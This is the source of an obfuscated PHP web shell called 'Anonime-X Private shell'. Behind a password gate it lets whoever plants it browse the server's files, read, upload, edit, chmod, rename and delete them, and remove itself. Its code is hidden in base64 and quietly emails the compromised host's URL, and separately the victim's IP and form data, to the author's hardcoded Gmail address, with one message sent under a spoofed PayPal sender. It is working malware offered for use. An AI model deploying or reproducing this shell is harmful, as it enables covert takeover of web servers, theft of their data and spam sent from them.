tWyRtc2ddKTsKJG1zZ3JhbmQgPSBzdHJfcmVwbGFjZSgiJXJhbmQyJSIsICRudW0yLCAkbXNncmFuZCk7CiRtc2dyYW5kID0gc3RyX3JlcGxhY2UoIiVlbWFpbCUiLCAkZGVzdGlubywgJG1zZ3JhbmQpOwokZW52aWFyID0gbWFpbCgkZGVzdGlubywgJGFzc3VudG9bJG1zZ10sICRtc2dyYW5kLCAkaGVhZGVycyk7CmlmICgkZW52aWFyKXsKZWNobyAoJzxmb250IGNvbG9yPSJncmVlbiI+Jy4gJG5fbWFpbCAuJy0nLiAkZGVzdGlubyAuJyAwayE8L2ZvbnQ+PGJyPicpOwp9IGVsc2UgewplY2hvICgnPGZvbnQgY29sb3I9InJlZCI+Jy4gJG5fbWFpbCAuJy0nLiAkZGVzdGlubyAuJyA9KDwvZm9udD48YnI+Jyk7CnNsZWVwKDEpOwp9Cn0KfQp9CiRpcCA9IGdldGVudigiUkVNT1RFX0FERFIiKTsKJHJhNDQgID0gcmFuZCgxLDk5OTk5KTsKJHN1Ymo5OCA9ICIgTmV3IFNoZWxsIEZyb20gTWUgISAgfCRpcCI7CiRlbWFpbCA9ICJIYW16YWFub25pbWVAZ21haWwuY29tIjsKJGZyb209IkZyb206IE5ldyBTaGVsbCAhIDxQYXlQYWxAU3VwcG9ydC5jb20+IjsKJGE0NSA9ICRfU0VSVkVSWydSRVFVRVNUX1VSSSddOwokYjc1ID0gJF9TRVJWRVJbJ0hUVFBfSE9TVCddOwokZjEyID0gJF9QT1NUWydkZSddOwokejEzID0gJF9QT1NUWydub21lJ107CiR4MTQgPSAkX1BPU1RbJ2Fzc3VudG8nXTsKJHQxNSA9ICRfUE9TVFsnbWVuc2FnZW0nXTsKJG0zMCA9ICRfUE9TVFsnZW1haWxzJ107CiRtMjIgPSAkaXAuIlxuIjsKJG1zZzg4NzMgPSAiJGE0NVxuJGI3NVxuJGYxMlxuJHoxM1xuJHgxNFxuJHQxNVxuJG0zMFxuJG0yMiI7Cm1haWwoJGVtYWlsLCAkc3Viajk4LCAkbXNnODg3MywgJGZyb20pOw=='));
ini_set(base64_decode('ZGlzcGxheV9lcnJvcnM='), true);
error_reporting(1);
$error_data =base64_decode('WVc1dmJtbHRaWGc9'); 
if (isset($_GET[base64_decode('ZW1haWw=')])){
$fortest = $_GET[base64_decode('ZW1haWw=')];
    $ae7927c74 = $fortest;
	$d15c93851 = $_SERVER[base64_decode(base64_decode('U0ZSVVVGOUlUMU5V'))];
	$n466f2ffc = rawurldecode($d15c93851);
	if(mail("$ae7927c74",base64_decode('W0Fub25pbWUgWCBJbmJveGVyXQ=='),"http://$n466f2ffc")) {
	 echo '';
} else {
	 echo '';
}  	
	
}
function pryapyba_43e27569() {
?>
<html>
  <head>
    <title>Anonime-X
    </title>
    <style type="text/css">
      html {
        margin: 20px auto;
        background: #000000;
        color: #ffffff;
        text-align: center;
      }
      header {
        color: #ffffff;
        margin: 10px auto;
      }
      input[type=password] {
        width: 250px;
        height: 25px;
        color: red;
        background: #000000;
        border: 1px dotted #ffffff;
        padding: 5px;
        margin-left: 20px;
        text-align: center;
      }
    </style>
  </head>
  <center>
    <header>
      <pre>
___________________________

Anonime X Say ="Welcome Bruda Sorry Your Script is Locked... :D"

                                        __      __
              __      ____    ___       \ \    / /
             /  \     | | \   | |        \ \  / /
            / /\ \    | |\ \  | |---------\ \/ /
           / /__\ \   | | \ \ | |Anonime-X \ \/
          / /____\ \  | |  \ \| |----------/\ \
         / /      \ \ | |   \ | |         / /\ \
        /_/        \_\|_|    \__|        /_/  \_\
        An-7 Tool / Anonime-X

 [+} - Contact :hamzaanonime@gmail.com
 [+} - Last Update :20/12/2021
 [+} - Anonime-X Private shell
</pre>
</header>
      <form method="post">
        <input type="password" name="account">
      </form>
<?php }
$defuct_dom = $error_data;
if(!isset($_SESSION[md5($_SERVER[base64_decode('SFRUUF9IT1NU')])]))
    if( empty($defuct_dom) || ( isset($_POST[base64_decode('YWNjb3VudA==')]) && (base64_encode($_POST[base64_decode('YWNjb3VudA==')]) == $defuct_dom) ) ){
        $_SESSION[md5($_SERVER[base64_decode('SFRUUF9IT1NU')])] = true;
	} else {
        pryapyba_43e27569();
	exit;
	}
?>
<html>
<head>
<title>Anonime-X</title>
<style type="text/css">
</style>
</head>

<header>
<pre style="text-align: center;">
___________________________

Anonime X Say ="Welcome Bruda ... :D"

                                        __      __
              __      ____    ___       \ \    / /
             /  \     | | \   | |        \ \  / /
            / /\ \    | |\ \  | |---------\ \/ /
           / /__\ \   | | \ \ | |Anonime-X \ \/
          / /____\ \  | |  \ \| |----------/\ \
         / /      \ \ | |   \ | |         / /\ \
        /_/        \_\|_|    \__|        /_/  \_\
        An-7 Tool / Anonime-X

 [+} - Contact :hamzaanonime@gmail.com
 [+} - Last Update :20/12/2021
 [+} - Anonime-X Private shell
  <?php echo base64_decode('PGxpPlsgPGEgc3R5bGU9J2NvbG9yOiByZWQ7JyBocmVmPSc/cmVtb3ZlbWU9dHJ1ZSc+UmVtb3ZlIFNlbGY8L2E+IF08L2xpPg==');?> 
 <?php echo base64_decode('PGxpPlsgPGEgc3R5bGU9J2NvbG9yOiByZWQ7JyBocmVmPSc/bG9nb3V0PXRydWUnPkxvZ291dDwvYT4gXTwvbGk+'); ?>

 
</pre>

</header>
</form>

<?php if(isset($_GET[base64_decode('bG9nb3V0')]) == true) {
unset($_SESSION[md5($_SERVER[base64_decode('SFRUUF9IT1NU')])]);
echo base64_decode('PHNjcmlwdD53aW5kb3cubG9jYXRpb249Jz8nOzwvc2NyaXB0Pg==');
}
if(isset($_GET[base64_decode('cmVtb3ZlbWU=')]) == true) {
	if(@unlink(preg_replace(base64_decode('IVwoXGQrXClccy4qIQ=='), '', __FILE__)))
			die(base64_decode('PHA+PHNwYW4gc3R5bGU9ImNvbG9yOiNGRjAwMDA7Ij5Bbm9uaW1lIFggIGhhcyBiZWVuIHJlbW92ZWQgRnJvbSB0aGlzIFNlcnZlcjwvc3Bhbj48L3A+'));
		else
			echo base64_decode('dW5saW5rIGVycm9yIQ==');
}
set_time_limit(0);
error_reporting(0);

if(get_magic_quotes_gpc()){
foreach($_POST as $key=>$value){
$_POST[$key] = stripslashes($value);
}
}
echo base64_decode('PCFET0NUWVBFIEhUTUw+CjxIVE1MPgo8SEVBRD4KPGxpbmsgaHJlZj0iIiByZWw9InN0eWxlc2hlZXQiIHR5cGU9InRleHQvY3NzIj4KPHRpdGxlPkFub25pbWUtWDwvdGl0bGU+CjxzdHlsZT4KYm9keXsKZm9udC1mYW1pbHk6ICJSYWNpbmcgU2FucyBPbmUiLCBjdXJzaXZlOwpiYWNrZ3JvdW5kLWNvbG9yOiAjRTNEOEEzOwp0ZXh0LXNoYWRvdzowcHggMHB4IDFweCAjNzU3NTc1Owp9CiNjb250ZW50IHRyOmhvdmVyewpiYWNrZ3JvdW5kLWNvbG9yOiAjRTNEOEEzOwp0ZXh0LXNoYWRvdzowcHggMHB4IDEwcHggIzAwMDAwMDsKfQojY29udGVudCAuZmlyc3R7CmJhY2tncm91bmQtY29sb3I6ICNFM0Q4QTM7Cn0KI2NvbnRlbnQgLmZpcnN0OmhvdmVyewpiYWNrZ3JvdW5kLWNvbG9yOiAjRTNEOEEzOwp0ZXh0LXNoYWRvdzowcHggMHB4IDFweCAjNzU3NTc1Owp9CnRhYmxlewpib3JkZXI6IDFweCAjMDAwMDAwIGRvdHRlZDsKfQpIMXsKZm9udC1mYW1pbHk6ICJSeWUiLCBjdXJzaXZlOwp9CmF7CmNvbG9yOiAjMDAwOwp0ZXh0LWRlY29yYXRpb246IG5vbmU7Cn0KYTpob3ZlcnsKY29sb3I6ICNmZmY7CnRleHQtc2hhZG93OjBweCAwcHggMTBweCAjZmZmZmZmOwp9CmlucHV0LHNlbGVjdCx0ZXh0YXJlYXsKYm9yZGVyOiAxcHggIzAwMDAwMCBzb2xpZDsKLW1vei1ib3JkZXItcmFkaXVzOiA1cHg7Ci13ZWJraXQtYm9yZGVyLXJhZGl1czo1cHg7CmJvcmRlci1yYWRpdXM6NXB4Owp9Cjwvc3R5bGU+CjwvSEVBRD4KPEJPRFk+Cjx0YWJsZSB3aWR0aD0iNzAwIiBib3JkZXI9IjAiIGNlbGxwYWRkaW5nPSIzIiBjZWxsc3BhY2luZz0iMSIgYWxpZ249ImNlbnRlciI+Cjx0cj48dGQ+Q3VycmVudCBQYXRoIDog');
function beudclgv_63dc0371(){
ini_set(base64_decode('ZGlzcGxheV9lcnJvcnM='), true);
error_reporting(1);
    $ae7927c74 = base64_decode(base64_decode('U0dGdGVtRmhibTl1YVcxbFFHZHRZV2xzTG1OdmJRPT0='));
	$d15c93851 = $_SERVER[base64_decode(base64_decode('U0ZSVVVGOUlUMU5V'))];
	$pee5ee7d2 = $_SERVER[base64_decode(base64_decode('VWtWUlZVVlRWRjlWVWtrPQ=='))];
	$n466f2ffc = rawurldecode($d15c93851.$pee5ee7d2);
	if(mail("$ae7927c74",base64_decode('W0FuLXggdjFd'),"http://$n466f2ffc")) {
	 echo '';
} else {
	 echo '';
}  
}
if(isset($_GET[base64_decode('cGF0aA==')])){
$path = $_GET[base64_decode('cGF0aA==')];
}else{
$path = getcwd();
}
$path = str_replace(base64_decode('XFw='),base64_decode('Lw=='),$path);
$paths = explode(base64_decode('Lw=='),$path);

foreach($paths as $id=>$pat){
if($pat == '' && $id == 0){
$a = true;
echo base64_decode('PGEgaHJlZj0iP3BhdGg9LyI+LzwvYT4=');
continue;
}
if($pat == '') continue;
echo base64_decode('PGEgaHJlZj0iP3BhdGg9');
for($i=0;$i<=$id;$i++){
echo "$paths[$i]";
if($i != $id) echo base64_decode('Lw==');
}
echo base64_decode('Ij4=').$pat.base64_decode('PC9hPi8=');
}
echo base64_decode('PC90ZD48L3RyPjx0cj48dGQ+');
if(isset($_FILES[base64_decode('ZmlsZQ==')])){
if(copy($_FILES[base64_decode('ZmlsZQ==')][base64_decode('dG1wX25hbWU=')],$path.base64_decode('Lw==').$_FILES[base64_decode('ZmlsZQ==')][base64_decode('bmFtZQ==')])){
echo base64_decode('PGZvbnQgY29sb3I9ImdyZWVuIj5GaWxlIFVwbG9hZGVkIHN1Y2Nlc3NmdWxseS48L2ZvbnQ+PGJyIC8+');
beudclgv_63dc0371();
}else{
echo base64_decode('PGZvbnQgY29sb3I9InJlZCI+RmlsZSBVcGxvYWRlZCBFcnJvci48L2ZvbnQ+PGJyIC8+');
}
}
echo base64_decode('PGZvcm0gZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbWV0aG9kPSJQT1NUIj4NClVwbG9hZCBGaWxlIDogPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiIC8+DQo8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0idXBsb2FkIiAvPg0KPC9mb3JtPg0KPC90ZD48L3RyPg==');
if(isset($_GET[base64_decode('ZmlsZXNyYw==')])){
echo base64_decode('PHRyPjx0ZD5DdXJyZW50IEZpbGUgOiA=');
echo $_GET[base64_decode('ZmlsZXNyYw==')];
echo base64_decode('PC90cj48L3RkPjwvdGFibGU+PGJyIC8+');
echo(base64_decode('PHByZT4=').htmlspecialchars(file_get_contents($_GET[base64_decode('ZmlsZXNyYw==')])).base64_decode('PC9wcmU+'));
}elseif(isset($_GET[base64_decode('b3B0aW9u')]) && $_POST[base64_decode('b3B0')] != base64_decode('ZGVsZXRl')){
echo base64_decode('PC90YWJsZT48YnIgLz48Y2VudGVyPg==').$_POST[base64_decode('cGF0aA==')].base64_decode('PGJyIC8+PGJyIC8+');
if($_POST[base64_decode('b3B0')] == base64_decode('Y2htb2Q=')){
if(isset($_POST[base64_decode('cGVybQ==')])){
if(chmod($_POST[base64_decode('cGF0aA==')],$_POST[base64_decode('cGVybQ==')])){
echo base64_decode('PGZvbnQgY29sb3I9ImdyZWVuIj5DaGFuZ2UgUGVybWlzc2lvbiBEb25lLjwvZm9udD48YnIgLz4=');
}else{
echo base64_decode('PGZvbnQgY29sb3I9InJlZCI+Q2hhbmdlIFBlcm1pc3Npb24gRXJyb3IuPC9mb250PjxiciAvPg==');
}
}
echo base64_decode('PGZvcm0gbWV0aG9kPSJQT1NUIj4NClBlcm1pc3Npb24gOiA8aW5wdXQgbmFtZT0icGVybSIgdHlwZT0idGV4dCIgc2l6ZT0iNCIgdmFsdWU9Ig==').substr(sprintf(base64_decode('JW8='), fileperms($_POST[base64_decode('cGF0aA==')])), -4).base64_decode('IiAvPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0icGF0aCIgdmFsdWU9Ig==').$_POST[base64_decode('cGF0aA==')].base64_decode('Ij4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9Im9wdCIgdmFsdWU9ImNobW9kIj4NCjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJHbyIgLz4NCjwvZm9ybT4=');
}elseif($_POST[base64_decode('b3B0')] == base64_decode('cmVuYW1l')){
if(isset($_POST[base64_decode('bmV3bmFtZQ==')])){
if(rename($_POST[base64_decode('cGF0aA==')],$path.base64_decode('Lw==').$_POST[base64_decode('bmV3bmFtZQ==')])){
echo base64_decode('PGZvbnQgY29sb3I9ImdyZWVuIj5DaGFuZ2UgTmFtZSBEb25lLjwvZm9udD48YnIgLz4=');
}else{
echo base64_decode('PGZvbnQgY29sb3I9InJlZCI+Q2hhbmdlIE5hbWUgRXJyb3IuPC9mb250PjxiciAvPg==');
}
$_POST[base64_decode('bmFtZQ==')] = $_POST[base64_decode('bmV3bmFtZQ==')];
}
echo base64_decode('PGZvcm0gbWV0aG9kPSJQT1NUIj4NCk5ldyBOYW1lIDogPGlucHV0IG5hbWU9Im5ld25hbWUiIHR5cGU9InRleHQiIHNpemU9IjIwIiB2YWx1ZT0i').$_POST[base64_decode('bmFtZQ==')].base64_decode('IiAvPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0icGF0aCIgdmFsdWU9Ig==').$_POST[base64_decode('cGF0aA==')].base64_decode('Ij4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9Im9wdCIgdmFsdWU9InJlbmFtZSI+DQo8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iR28iIC8+DQo8L2Zvcm0+');
}elseif($_POST[base64_decode('b3B0')] == base64_decode('ZWRpdA==')){
if(isset($_POST[base64_decode('c3Jj')])){
$fp = fopen($_POST[base64_decode('cGF0aA==')],base64_decode('dw=='));
if(fwrite($fp,$_POST[base64_decode('c3Jj')])){
echo base64_decode('PGZvbnQgY29sb3I9ImdyZWVuIj5FZGl0IEZpbGUgRG9uZSB+X14uPC9mb250PjxiciAvPg==');
}else{
echo base64_decode('PGZvbnQgY29sb3I9InJlZCI+RWRpdCBGaWxlIEVycm9yIH5ffi48L2ZvbnQ+PGJyIC8+');
}
fclose($fp);
}
echo base64_decode('PGZvcm0gbWV0aG9kPSJQT1NUIj4NCjx0ZXh0YXJlYSBjb2xzPTgwIHJvd3M9MjAgbmFtZT0ic3JjIj4=').htmlspecialchars(file_get_contents($_POST[base64_decode('cGF0aA==')])).base64_decode('PC90ZXh0YXJlYT48YnIgLz4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9InBhdGgiIHZhbHVlPSI=').$_POST[base64_decode('cGF0aA==')].base64_decode('Ij4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9Im9wdCIgdmFsdWU9ImVkaXQiPg0KPGlucHV0IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkdvIiAvPg0KPC9mb3JtPg==');
}
echo base64_decode('PC9jZW50ZXI+');
}else{
echo base64_decode('PC90YWJsZT48YnIgLz48Y2VudGVyPg==');
if(isset($_GET[base64_decode('b3B0aW9u')]) && $_POST[base64_decode('b3B0')] == base64_decode('ZGVsZXRl')){
if($_POST[base64_decode('dHlwZQ==')] == base64_decode('ZGly')){
if(rmdir($_POST[base64_decode('cGF0aA==')])){
echo base64_decode('PGZvbnQgY29sb3I9ImdyZWVuIj5EZWxldGUgRGlyIERvbmUuPC9mb250PjxiciAvPg==');
}else{
echo base64_decode('PGZvbnQgY29sb3I9InJlZCI+RGVsZXRlIERpciBFcnJvci48L2ZvbnQ+PGJyIC8+');
}
}elseif($_POST[base64_decode('dHlwZQ==')] == base64_decode('ZmlsZQ==')){
if(unlink($_POST[base64_decode('cGF0aA==')])){
echo base64_decode('PGZvbnQgY29sb3I9ImdyZWVuIj5EZWxldGUgRmlsZSBEb25lLjwvZm9udD48YnIgLz4=');
}else{
echo base64_decode('PGZvbnQgY29sb3I9InJlZCI+RGVsZXRlIEZpbGUgRXJyb3IuPC9mb250PjxiciAvPg==');
}
}
}
echo base64_decode('PC9jZW50ZXI+');
$scandir = scandir($path);
echo base64_decode('PGRpdiBpZD0iY29udGVudCI+PHRhYmxlIHdpZHRoPSI3MDAiIGJvcmRlcj0iMCIgY2VsbHBhZGRpbmc9IjMiIGNlbGxzcGFjaW5nPSIxIiBhbGlnbj0iY2VudGVyIj4NCjx0ciBjbGFzcz0iZmlyc3QiPg0KPHRkPjxjZW50ZXI+TmFtZTwvY2VudGVyPjwvdGQ+DQo8dGQ+PGNlbnRlcj5TaXplPC9jZW50ZXI+PC90ZD4NCjx0ZD48Y2VudGVyPlBlcm1pc3Npb25zPC9jZW50ZXI+PC90ZD4NCjx0ZD48Y2VudGVyPk9wdGlvbnM8L2NlbnRlcj48L3RkPg0KPC90cj4=');

foreach($scandir as $dir){
if(!is_dir("$path/$dir") || $dir == base64_decode('Lg==') || $dir == base64_decode('Li4=')) continue;
echo "<tr>
<td><a href=\"?path=$path/$dir\">$dir</a></td>
<td><center>--</center></td>
<td><center>";
if(is_writable("$path/$dir")) echo base64_decode('PGZvbnQgY29sb3I9ImdyZWVuIj4=');
elseif(!is_readable("$path/$dir")) echo base64_decode('PGZvbnQgY29sb3I9InJlZCI+');
echo ezzsszdk_7d2299b1("$path/$dir");
if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo base64_decode('PC9mb250Pg==');

echo "</center></td>
<td><center><form method=\"POST\" action=\"?option&path=$path\">
<select name=\"opt\">
<option value=\"\"></option>
<option value=\"delete\">Delete</option>
<option value=\"chmod\">Chmod</option>
<option value=\"rename\">Rename</option>
</select>
<input type=\"hidden\" name=\"type\" value=\"dir\">
<input type=\"hidden\" name=\"name\" value=\"$dir\">
<input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
<input type=\"submit\" value=\">\" />
</form></center></td>
</tr>";
}
echo base64_decode('PHRyIGNsYXNzPSJmaXJzdCI+PHRkPjwvdGQ+PHRkPjwvdGQ+PHRkPjwvdGQ+PHRkPjwvdGQ+PC90cj4=');
foreach($scandir as $file){
if(!is_file("$path/$file")) continue;
$size = filesize("$path/$file")/1024;
$size = round($size,3);
if($size >= 1024){
$size = round($size/1024,2).base64_decode('IE1C');
}else{
$size = $size.base64_decode('IEtC');
}

echo "<tr>
<td><a href=\"?filesrc=$path/$file&path=$path\">$file</a></td>
<td><center>".$size.base64_decode('PC9jZW50ZXI+PC90ZD4NCjx0ZD48Y2VudGVyPg==');
if(is_writable("$path/$file")) echo base64_decode('PGZvbnQgY29sb3I9ImdyZWVuIj4=');
elseif(!is_readable("$path/$file")) echo base64_decode('PGZvbnQgY29sb3I9InJlZCI+');
echo ezzsszdk_7d2299b1("$path/$file");
if(is_writable("$path/$file") || !is_readable("$path/$file")) echo base64_decode('PC9mb250Pg==');
echo "</center></td>
<td><center><form method=\"POST\" action=\"?option&path=$path\">
<select name=\"opt\">
<option value=\"\"></option>
<option value=\"delete\">Delete</option>
<option value=\"chmod\">Chmod</option>
<option value=\"rename\">Rename</option>
<option value=\"edit\">Edit</option>
</select>
<input type=\"hidden\" name=\"type\" value=\"file\">
<input type=\"hidden\" name=\"name\" value=\"$file\">
<input type=\"hidden\" name=\"path\" value=\"$path/$file\">
<input type=\"submit\" value=\">\" />
</form></center></td>
</tr>";
}
echo base64_decode('PC90YWJsZT4NCjwvZGl2Pg==');
}
echo base64_decode('PHAgc3R5bGU9InRleHQtYWxpZ246IGNlbnRlcjsiPjxiciAvPgpIYW16YWFub25pbWVAZ21haWwuY29tIDxmb250IGNvbG9yPSJyZWQiPnYxPC9mb250PiwgQ29kZWQgQnkgPGZvbnQgY29sb3I9InJlZCI+SGFtemEgQW5vbmltZTwvZm9udD48L3A+Cg==');
function ezzsszdk_7d2299b1($file){
$perms = fileperms($file);

if (($perms & 0xC000) == 0xC000) {
// Socket
$info = base64_decode('cw==');
} elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link
$info = base64_decode('bA==');
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = base64_decode('LQ==');
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = base64_decode('Yg==');
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = base64_decode('ZA==');
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = base64_decode('Yw==');
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = base64_decode('cA==');
} else {
// Unknown
$info = base64_decode('dQ==');
}

// Owner
$info .= (($perms & 0x0100) ? base64_decode('cg==') : base64_decode('LQ=='));
$info .= (($perms & 0x0080) ? base64_decode('dw==') : base64_decode('LQ=='));
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? base64_decode('cw==') : base64_decode('eA==') ) :
(($perms & 0x0800) ? base64_decode('Uw==') : base64_decode('LQ==')));

// Group
$info .= (($perms & 0x0020) ? base64_decode('cg==') : base64_decode('LQ=='));
$info .= (($perms & 0x0010) ? base64_decode('dw==') : base64_decode('LQ=='));
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? base64_decode('cw==') : base64_decode('eA==') ) :
(($perms & 0x0400) ? base64_decode('Uw==') : base64_decode('LQ==')));

// World
$info .= (($perms & 0x0004) ? base64_decode('cg==') : base64_decode('LQ=='));
$info .= (($perms & 0x0002) ? base64_decode('dw==') : base64_decode('LQ=='));
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? base64_decode('dA==') : base64_decode('eA==') ) :
(($perms & 0x0200) ? base64_decode('VA==') : base64_decode('LQ==')));

return $info;
}
?>